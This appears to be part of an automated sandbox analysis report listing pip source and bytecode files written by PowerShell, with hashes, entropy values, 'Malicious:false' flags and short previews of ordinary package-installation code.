                                                                                                    SHA-256:254A517FEE4647220D2F850E6F7A86AAD10740FCFDAA1C029448E092936A4793
                                                                                                    SHA-512:F496995742EB47D4B1E90DCE6C333AB18A998ED3198343505E43705A1E32F8D3420889C6A3F87E1AE9049AA2EDF9BF9EBE72966B3956301BC082BC4A7D8539D7
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.e.....d.e.e.....d.e.e.....d.e.d.e.d.e.d.e.d.e.d.e.d.d.f.d...Z.y.).z?Legacy editable installation process, i.e. `setup.py develop`.......N)...Optional..Sequence)...BuildEnvironment)...indent_log)...make_setuptools_develop_args)...call_subprocess..global_options..prefix..home..use_user_site..name..setup_py_path..isolated..build_env..unpacked_source_directory..returnc...........................t.........j...................d.|...........t.........|.|.|.|.|.|...........}.t.................5...|.5...t.........|.d.|.............d.d.d...........d.d.d...........y.#.1.s.w...Y.......x.Y.w.#.1.s.w...Y.....y.x.Y.w.).z[Install a package in editable mode. Most arguments are pass-through. to setuptools.. z.Running setup.py develop for %s).r......no_user_configr....r....r....z.python setup.py develop)...command_desc..cwdN)...logger..infor
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33868
                                                                                                    Entropy (8bit):5.394269867211978
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zR2WOFltE/3NJiJuhwT8o2pABLhcyoAe/rsl/d0Vkycqmeg38czAuJAl9V8:7OFla/niACOIhpo3W1028cst9K
                                                                                                    MD5:5B22422591E7F7CF6DC238E66D235A00
                                                                                                    SHA1:CF6F50AF3F5E943CE15DC87755C7EAFFBEC358C7
                                                                                                    SHA-256:945B40359C7FEE0017D31EF16ECD384B79E86931BC8EEAB4B9F305CBBB06ACD7
                                                                                                    SHA-512:61FBD44601792E2A3319B36D2B04D91FC64F00608DF3FF301076CC3576FE6F226D8FD3C6E62D14C96F6A9508FBEE15786BAE66805970B1FFE9F4C289351A7B56
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.j.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6m7Z7..d.d.l8m9Z9m:Z:..d.d.l;m<Z<m=Z=..d.d.l>m?Z?m@Z@..d.d.lAmBZBmCZCmDZDmEZE..d.d.lFmGZGmHZHmIZImJZJ..d.d.lKmLZL..e.r.d.d.l.mMZM....G.d...d.eM........ZN..e.j...................eP........ZQ..e d.eR........ZSe$eSeRe%eTeRf.....f.....ZUdId.eRd.eTd.e$eReRf.....f.d...ZVd.eRd.e.eRe.f.....f.d...ZWd.eRd.eXf.d...ZYd.e.d.eXf.d ..ZZd!e5d.e$e.eReRf.....e.eReRf.....f.....f.d"..Z[d#e"eR....d.e!eR....f.d$..Z\d%e.eU....d.e.e$eReReRf.........f.d&..Z]d'eSd(eRd.eRf.d)..Z^d.eRd(eRd.eSf.d*..Z_d+e.e.eR........d,e.eSeSf.....d-e#eS....d.e.eR....d(eRd.e.eU....f.d/..Z`d0e.eReRf.....d.e.eR....f.d1..Za..G.d2..d3........Zb..G.d4..d5........Zc..G.d6..d7e1........Zdd8eRd.d.f.d9
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1282
                                                                                                    Entropy (8bit):4.529425309919988
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:6NXahpouY2vZHVY/vPXIAavFw3pm8MUUKxmml97+ZyICoUC:iXaPXvZ1savi5m8JUNZyrC
                                                                                                    MD5:DCB76A8AD093B7E45F58BE9D79106C59
                                                                                                    SHA1:61A524BDA27C4AB0F2BD898903EE87E51D34F59A
                                                                                                    SHA-256:61E47429A7565F0FD985E0B536D006D6A5481243A04461DCDB7C7E62D196ECD5
                                                                                                    SHA-512:C00A2CF22BBDBEA5D024F1F2181A0D7557675A7B2C28B9DF9D58466E1E36111A6406D9F0D1587FA4D5E5FD07081580DB08D72DC26AA5A8B83709AD3D56EDAE8D
                                                                                                    Malicious:false
                                                                                                    Preview:"""Legacy editable installation process, i.e. `setup.py develop`..""".import logging.from typing import Optional, Sequence..from pip._internal.build_env import BuildEnvironment.from pip._internal.utils.logging import indent_log.from pip._internal.utils.setuptools_build import make_setuptools_develop_args.from pip._internal.utils.subprocess import call_subprocess..logger = logging.getLogger(__name__)...def install_editable(. *,. global_options: Sequence[str],. prefix: Optional[str],. home: Optional[str],. use_user_site: bool,. name: str,. setup_py_path: str,. isolated: bool,. build_env: BuildEnvironment,. unpacked_source_directory: str,.) -> None:. """Install a package in editable mode. Most arguments are pass-through. to setuptools.. """. logger.info("Running setup.py develop for %s", name).. args = make_setuptools_develop_args(. setup_py_path,. global_options=global_options,. no_user_config=isolated,. prefix=pref
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27311
                                                                                                    Entropy (8bit):4.642708671405098
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:0GHMR/kRyVVi89DzT8O1WCqclVNe3nHCFvtoMWgCq2JTRH:0QI/bPnkVclVNe3H6hE1RH
                                                                                                    MD5:F885BF99952E370232B260C8B3A4A2B0
                                                                                                    SHA1:1CC61594079640CF319031BD5FD0F278ED519D1E
                                                                                                    SHA-256:F6119BD5CE1B4673C86F6146EC2B5448F7CFC6AA6B987401B702009563CD4ED1
                                                                                                    SHA-512:A16709DACFB9BAB959F2537C09B1673332F8A67DA65FF2877401E4768E83B34ABAE4B3E966A65ED1B04E7159B240AC4EFED0832E0300F396FD2F66D5B185D7D0
                                                                                                    Malicious:false
                                                                                                    Preview:"""Support for installing and building the "wheel" binary package format.."""..import collections.import compileall.import contextlib.import csv.import importlib.import logging.import os.path.import re.import shutil.import sys.import warnings.from base64 import urlsafe_b64encode.from email.message import Message.from itertools import chain, filterfalse, starmap.from typing import (. IO,. TYPE_CHECKING,. Any,. BinaryIO,. Callable,. Dict,. Generator,. Iterable,. Iterator,. List,. NewType,. Optional,. Sequence,. Set,. Tuple,. Union,. cast,.).from zipfile import ZipFile, ZipInfo..from pip._vendor.distlib.scripts import ScriptMaker.from pip._vendor.distlib.util import get_export_entry.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import InstallationError.from pip._internal.locations import get_major_minor_version.from pip._internal.metadata import (. BaseDistribution,. FilesystemWheel,. ge
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28128
                                                                                                    Entropy (8bit):4.3534757921233584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:6wqVVk3BUI64dQw93NywZO6FK1pbSTB5wqCMrcAr4OVN3h5rgcyxK:sp8QZwZTccaqCM/rJVN3LgcmK
                                                                                                    MD5:D47E3EB660F7DBCAEC2D8BB2BC871B01
                                                                                                    SHA1:DC57A38D370F140ADFB08A5C8EDD2E35FF19EB40
                                                                                                    SHA-256:E7B3AAF3B1DFBA75F745BAA9E3B15D689AFD7076C02949BFDE0BFB5A1040A9B1
                                                                                                    SHA-512:7DF3547C12AB029CA0B7D2CF0FAC89CD65AC3273C347DACD1BE635F24FD690576015C7516326A650076D8A6507DCF0BA0D571598B2920BB4A8336435C847D3CB
                                                                                                    Malicious:false
                                                                                                    Preview:"""Prepares a distribution for installation."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import mimetypes.import os.import shutil.from pathlib import Path.from typing import Dict, Iterable, List, Optional..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.distributions.installed import InstalledDistribution.from pip._internal.exceptions import (. DirectoryUrlHashUnsupported,. HashMismatch,. HashUnpinned,. InstallationError,. MetadataInconsistent,. NetworkConnectionError,. VcsHashUnsupported,.).from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_metadata_distribution.from pip._internal.models.direct_url import ArchiveInfo.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.netwo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7152
                                                                                                    Entropy (8bit):4.544558175493023
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qWhBuxc89eeuB3bybJ9dlwdNHyYhf9QGpo5QZOv7Q4IY4LrMn4sNqXj/Qy8uO+ND:qWh5890mLw7ycf91SgE7QsnE/DNiMSg
                                                                                                    MD5:EA947CFEEE9C6ADD3CA6D39E9EFA3C98
                                                                                                    SHA1:E28E26069246AB43190B65A83D9A362D31623D07
                                                                                                    SHA-256:E17B33A75D7182BD76EB2CC6E816C9034A1A43D597BA16F48F251BFB2FFA94F4
                                                                                                    SHA-512:5FCF07C4A901B2D768996D1275E5B680706C6B703F7EE526A0A1EED8660C2E1F0DFC2C1564E19A07663C24F73D983FD43ACCFC3F82E57C6EC0DBB3B427436569
                                                                                                    Malicious:false
                                                                                                    Preview:import importlib.util.import os.from collections import namedtuple.from typing import Any, List, Optional..from pip._vendor import tomli.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement..from pip._internal.exceptions import (. InstallationError,. InvalidPyProjectBuildRequires,. MissingPyProjectBuildRequires,.)...def _is_list_of_str(obj: Any) -> bool:. return isinstance(obj, list) and all(isinstance(item, str) for item in obj)...def make_pyproject_path(unpacked_source_directory: str) -> str:. return os.path.join(unpacked_source_directory, "pyproject.toml")...BuildSystemDetails = namedtuple(. "BuildSystemDetails", ["requires", "backend", "check", "backend_path"].)...def load_pyproject_toml(. use_pep517: Optional[bool], pyproject_toml: str, setup_py: str, req_name: str.) -> Optional[BuildSystemDetails]:. """Load the pyproject.toml file... Parameters:. use_pep517 - Has the user requested PEP 517 processing? None.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2738
                                                                                                    Entropy (8bit):4.326201740902436
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:dovZvw6xtd2ZhedgW+FbOjm+8CdCaksbZsIwZMtTwH8AXdjW:IxD122gW+Fbp+lCaksbpwmTQjW
                                                                                                    MD5:90F6415749AEAC444FDC82A5D4A67413
                                                                                                    SHA1:CF0EAD8F5FB907FC11C71DF8CBA39D7B2A024A1A
                                                                                                    SHA-256:4C42C58193A87F796132668809558BF54ECF9615E8F4EB9FA246CC009E89D862
                                                                                                    SHA-512:B85D577F6023DA280DF94ED9719FB64D804E0665EFC6014F5B3CF223D233966FFB9457A63A5CABE9BB097566314C42F46FB17E5B56F984154965F2A5A0BB6C02
                                                                                                    Malicious:false
                                                                                                    Preview:import collections.import logging.from typing import Generator, List, Optional, Sequence, Tuple..from pip._internal.utils.logging import indent_log..from .req_file import parse_requirements.from .req_install import InstallRequirement.from .req_set import RequirementSet..__all__ = [. "RequirementSet",. "InstallRequirement",. "parse_requirements",. "install_given_reqs",.]..logger = logging.getLogger(__name__)...class InstallationResult:. def __init__(self, name: str) -> None:. self.name = name.. def __repr__(self) -> str:. return f"InstallationResult(name={self.name!r})"...def _validate_requirements(. requirements: List[InstallRequirement],.) -> Generator[Tuple[str, InstallRequirement], None, None]:. for req in requirements:. assert req.name, f"invalid to-be-installed requirement: {req}". yield req.name, req...def install_given_reqs(. requirements: List[InstallRequirement],. global_options: Sequence[str],. root: Optional[str],.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3752
                                                                                                    Entropy (8bit):5.523991616632478
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:w5bwq5cBqMDHOcprPd/kfOQqJcbPdzmwDTeZ:iP+BqevtPHWTi
                                                                                                    MD5:2D2160825AEA11B4F7F94F94BCA0D52F
                                                                                                    SHA1:AD1BBED423BEA148229741F5DBA8A7ABC45E8FC2
                                                                                                    SHA-256:709D1DF9A8A978716841B1E1E422EC31CA45AB76197415BB945B5CB16AFF602C
                                                                                                    SHA-512:7B9D6CEFEEECAC99D3282ED8249862A9275BFEA535CA2F5411A26CA8336E78D194FCEC0E8665F0EBDE656B9E36DB36A981EBDA1AAC47ECF1F9812CDCFF9C1ACC
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...e.j"..................e.........Z...G.d...d.........Z.d.e.e.....d.e.e.e.e.f.....d.d.f.....f.d...Z.d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Generator..List..Optional..Sequence..Tuple)...indent_log.....)...parse_requirements)...InstallRequirement)...RequirementSet).r....r....r......install_given_reqsc.....................(.....e.Z.d.Z.d.e.d.d.f.d...Z.d.e.f.d...Z.y.)...InstallationResult..name..returnNc...........................|.|._.........y.).N..r....)...selfr....s.... .fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/req/__init__.py..__init__z.InstallationResult.__init__....s..................c.....................".....d.|.j.....................d...S.).Nz.InstallationResult(name=..)r....).r....s.... r......__repr__z.InstallationResult.__repr__....s
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21591
                                                                                                    Entropy (8bit):5.43885919622193
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Xt86OlvUlRfaNE2Eg/zJCG3da2kpQK3FZhYuQBnEsyuP/IuZpk:Xt8LlvUjfaNEYzYIkpQaYuKEsNZZpk
                                                                                                    MD5:F7859F380BA6CB8005FEEE9A3A90046A
                                                                                                    SHA1:418B138E83ACF35A65275F926252059FD2231B56
                                                                                                    SHA-256:3E141C8B9964DB1314E8D3D4E7E18A0B3DABD352B15C034785328006198357C6
                                                                                                    SHA-512:D436172ACDFCC799CFEE9A22E3AE5F7569A2130150DAF09E09F2D91082B63C986304D9DBAF206FC7263D2A353AC1848053274A50F96ABA93F59E955419C56D10
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfJJ........................x.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+..g.d...Z,..e.jZ..................e.........Z/e.j`..................jc..........................Z2d.e3d.e.e3e.e3....f.....f.d...Z4d.e.e3....d.e.e3....f.d...Z5d.e.d.e.e3....d.e.f.d...Z6d.e3d.e.e.e3....e3e.e3....f.....f.d...Z7d.e3d.d.f.d...Z8d.e3d.e3f.d...Z9..G.d ..d!........Z:d.e3d.e:f.d"..Z;..d?d.d#d.d.d#d#d#d.d$..d.e3d%e.e.e e3f.........d&e.e<....d'e<d(e.e.e3........d)e.e.e3e.e3....f.........d*e<d+e<d,e<d-e.e.e3e.e3e.e3....f.....f.........d.e f.d...Z=d/e3d.e<f.d0..Z>d.e3d/e3d.e.e3....f.d1..Z?d/e3d2e.e3....d.e:f.d3..Z@..d?d.d#d.d.d#d.d#d.d4..d/e3d%e.e.e3e f.........d&e.e<....d'e<d(e.e.e3........d)e.e.e3e.e3....f.........d*e<d2e.e3....d+e<d-e.e.e3e.e3e.e3....f.....f.........d.e f.d5..ZA........d@d6
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21470
                                                                                                    Entropy (8bit):5.455486521872338
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lPt3l3ZckffNiknwp3k/TXzKJgwV6/Z9ArSbJ0t/okqfDO:dt3VZ/I9JWTXzug5Z9Zmt/ofK
                                                                                                    MD5:C4C8043078DE5611623881BF330DE2C0
                                                                                                    SHA1:4A1BDD2018BF5C2B29EA0CFD479A3E2CFA914618
                                                                                                    SHA-256:AB427FC225DE7DFBAD98814A49D1CC56D50E7B10F4E37513A7796BFD9C1EE88D
                                                                                                    SHA-512:47D3685B8471B8D71853426B7475AF4C0604C2938886631795871885E484E392E7D15F5C163077CA11A9EE41499AD34C0D3E3A682CF9A09D7C11B3DBB2E6D994
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf~E.............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..e.r.d.d.l.m"Z"..d.d.l#m$Z$..d.g.Z%e.e.e&e'f.........Z(e.e'g.e.e'e.f.....f.....Z)..e.jT..................d.e.jV..........................Z,..e.jT..................d.........Z-..e.jT..................d.........Z.e.j^..................e.j`..................e.jb..................e.jd..................e.jf..................e.jh..................e.jj..................e.jl..................e.jn..................e.jp..................e.jr..................e.jt..................e.jv..................e.jx..................g.Z=e.e.d.e.j|..................f.........e?d.<...e.j...................e.j...................e.j...................g.ZCe.e.d.e.j|..................f.........e?d.<...e.j...................g.ZDe.e.d.e.j|..................f.........e?d.<...eC
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38423
                                                                                                    Entropy (8bit):5.288724359962651
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:3gqqB5KvexzBluXkShnSmYSpylYAw+zerW9:3gqqBcWxp1IpyqG8S
                                                                                                    MD5:A414B5BFEEA78E60A2B5A12B8BB9A0EA
                                                                                                    SHA1:D240061FC265193F9E3329FD5081A9613B4CB808
                                                                                                    SHA-256:6A18D88D62005E7915F14F62EDDAC5B70E155701CAAD97B727D878A6F91D5F81
                                                                                                    SHA-512:99C341611F7104F7A548FA7EEABC4428A293CCF02541BC6A3FB77A591EC9F7A956F7456C9611CB27B19EC3E82A1595800503B0CDDCC905F222F8E1BF152FC729
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#m$Z$..d.d.l%m&Z&m'Z'..d.d.l(m)Z)..d.d.l*m+Z+m,Z,m-Z-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m6Z:..d.d.l;m<Z=..d.d.l>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..d.d.lEmFZF..d.d.lGmHZH..d.d.lImJZJmKZKmLZLmMZMmNZNmOZOmPZPmQZQ..d.d.lRmSZS..d.d.lTmUZU..d.d.lVmWZWmXZX..d.d.lYmZZZ..d.d l[m\Z\..d.d!l]m^Z^....e.j...................e`........Za..G.d"..d#........Zbd$ebd%ecf.d&..Zdd'e.d(e.eb....d)ecd%eef.d*..Zfd'e.d(e.eb....d%d.f.d+..Zgy.),.....N)...Values)...Path)...Any..Collection..Dict..Iterable..List..Optional..Sequence..Union)...Marker)...Requirement)...SpecifierSet)...canonicalize_name)...Version)...parse)...BuildBackendHookCaller)...BuildEnvironment..NoOpBuildEnvironment)...InstallationError..PreviousBuildDirError).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7227
                                                                                                    Entropy (8bit):5.246466312937501
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:tuIvP5dUIlHhvbUxtcZ5H29Hpt0au0hTFYmREJGKp8lfXtktpwkT5gUNQ:tT9lBvAxaf2h0azFLy7p819k395m
                                                                                                    MD5:2B462A8E1DF7C91129275EAC5728010E
                                                                                                    SHA1:A9F06AB060152133D93D03D1ADA3519AD2548FD2
                                                                                                    SHA-256:C25E39D2CB3589FEBF33D59BE8AF0D5219B60027987E56587DBF22453C7BC628
                                                                                                    SHA-512:5135E107795780FA7C8417A882D9AB4B0329ED8348F6AE3B0F2EA6F31F00116D84381273AADC847EE3EB8F325BACBF2B4AFD52C5EE249EB6E68560AEDDC54EC6
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf`..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j ..................e.........Z...G.d...d.........Z.y.)......N)...OrderedDict)...Dict..List)...LegacySpecifier)...canonicalize_name)...LegacyVersion)...InstallRequirement)...deprecatedc..........................e.Z.d.Z.d.d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.e.d.e.e.....f.d...........Z.e.d.e.e.....f.d...........Z.d.d...Z.y.)...RequirementSet..check_supported_wheels..returnNc.....................>.....t.................|._.........|.|._.........g.|._.........y.).z.Create a RequirementSet.N).r......requirementsr......unnamed_requirements)...selfr....s.... .eC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/req/req_set.py..__init__z.RequirementSet.__init__....s.........<G..=......&<....#.>@....!.....c..........................t.........d...|.j
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32986
                                                                                                    Entropy (8bit):5.206160340422903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:8P/s8bDt+8cFqeSOlkn05Mm4/uZrwG/CtFC1430Bb:8P/ZbDA1FfDAC14Ob
                                                                                                    MD5:7A972D5EDF962BBF847646597EE808FC
                                                                                                    SHA1:4DA52AFD33EFDFE275A6E399C26A17074A35815E
                                                                                                    SHA-256:2E33DEF2A49D72EE3AAD83311C985C05C23777D8AE35A3FE10AAACA5AC8B5583
                                                                                                    SHA-512:7A600694063228C048E5085709040C18D496CB19AACF701FD1182F92319BF5A14EEE18A328B80BAEBC24787A72E07DE940FFB772545B5E5F83C03783E4092CCE
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf._..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m'Z'....e.e(........Z)d.e*d.e*d.e+d.e.e*d.d.f.....f.d...Z,d.e.d.e.e.d.d.f.....f.....d.e.d.e.e.d.d.f.....f.....f.d...Z-e-d.e.d.e.e*d.d.f.....f.d...........Z.d.e.e*....d.e.e*....f.d...Z/d.e.e*....d.e.e*....f.d...Z0d.e.e*....d.e.e.e*....e.e*....f.....f.d...Z1..G.d...d.........Z2..G.d...d.........Z3..G.d...d ........Z4y.)!.....N)...cache_from_source)...Any..Callable..Dict..Generator..Iterable..List..Optional..Set..Tuple)...UninstallationError)...get_bin_prefix..get_bin_user)...BaseDistribution)...WINDOWS)...egg_link_path_from_location)...getLogger..indent_log)...ask..normalize_path..renames..rmtree)...AdjacentTempDirectory..TempDirectory)...running_under_virtualenv..bin_dir..script_name..is_gui..returnc................#.......K.....t..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19018
                                                                                                    Entropy (8bit):4.5153846504298185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:bYk+ErtWMTIHs16EvJT7HpPw1FZresif6kckMFvGAgBCl4q:Drw57Wtoib/tAhL
                                                                                                    MD5:18D03004D257F83A9E3D4110530F71F3
                                                                                                    SHA1:95D491FF36169C0C5FFFE9AEE67B6A6FD10BECD9
                                                                                                    SHA-256:F21958E7A8A612D84B3914709A5A322B3DD83B25F298868AB0D07A3FD7B0BCD2
                                                                                                    SHA-512:5CA7D9B1309EE20B72D63534480740CAD441571AA4AE2695157849DC263657C1AED2087FB871D8B4EC990D2AB0A1C5D593680ACD2669190FF58999987C99895B
                                                                                                    Malicious:false
                                                                                                    Preview:"""Backing implementation for InstallRequirement's various constructors..The idea here is that these formed a major chunk of InstallRequirement's size.so, moving them and support code dedicated to them outside of that class.helps creates for better understandability for the rest of the code...These are meant to be used elsewhere within pip to create instances of.InstallRequirement.."""..import copy.import logging.import os.import re.from typing import Collection, Dict, List, Optional, Set, Tuple, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement.from pip._vendor.packaging.specifiers import Specifier..from pip._internal.exceptions import InstallationError.from pip._internal.models.index import PyPI, TestPyPI.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.req.req_file import ParsedRequirement.from pip._internal.req.req_install import InstallRequ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17790
                                                                                                    Entropy (8bit):4.538498148383151
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:u0aYhgUFZckXTdrk01YlroGD5CIPwSwiwv2+90P:uwZ/jdfs1tPwS/HP
                                                                                                    MD5:236D5B49A91A74A3AD27F50FA3FA2C3C
                                                                                                    SHA1:3BA2944C19D21912A4DA5ECFAF37EA692CCF1AC3
                                                                                                    SHA-256:33CB6D3992FE3F0023EEC70F125856DD90F68620FD9A6FFA14900621BC00CC42
                                                                                                    SHA-512:DCF14E141C1A2239E9CB3D0D1AFD89E2A6DCF1D3BA8F01D59D318382F2082CD4F4077948F4FB97C3318C6CF1993D4C4B1FFD9570D82B5B6C69C15B500AA122B5
                                                                                                    Malicious:false
                                                                                                    Preview:""".Requirements file parsing."""..import logging.import optparse.import os.import re.import shlex.import urllib.parse.from optparse import Values.from typing import (. TYPE_CHECKING,. Any,. Callable,. Dict,. Generator,. Iterable,. List,. Optional,. Tuple,.)..from pip._internal.cli import cmdoptions.from pip._internal.exceptions import InstallationError, RequirementsFileParseError.from pip._internal.models.search_scope import SearchScope.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.encoding import auto_decode.from pip._internal.utils.urls import get_url_scheme..if TYPE_CHECKING:. # NoReturn introduced in 3.6.2; imported only for type checking to maintain. # pip compatibility with older patch versions of Python 3.6. from typing import NoReturn.. from pip._internal.index.package_finder import PackageFinder..__all__ = ["parse_requirements"]..ReqFileLines = Itera
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35460
                                                                                                    Entropy (8bit):4.349820575274182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:z+M0Pf6CKYptCGjRZMBm5m3ojz2JQw9u3W/3:zm6mptCWUqz2J9J/3
                                                                                                    MD5:DA54C14920379FE466FF0DA19B7028AC
                                                                                                    SHA1:9C22316E093B009D97FE5D36431C31099BF5CCA7
                                                                                                    SHA-256:C2D38FC64C9148CF1CA264E4B3CA0BD46A76A321AA6C7EC9C080D1722D9088F9
                                                                                                    SHA-512:F9DBEB8B249146AC2EA96C6BA277EA0F182E134DC8FC0570FC09642151E92E50A44626E90B5E4FBD52BE77C8DB48486C038063580B2065AAD954069336E41BDF
                                                                                                    Malicious:false
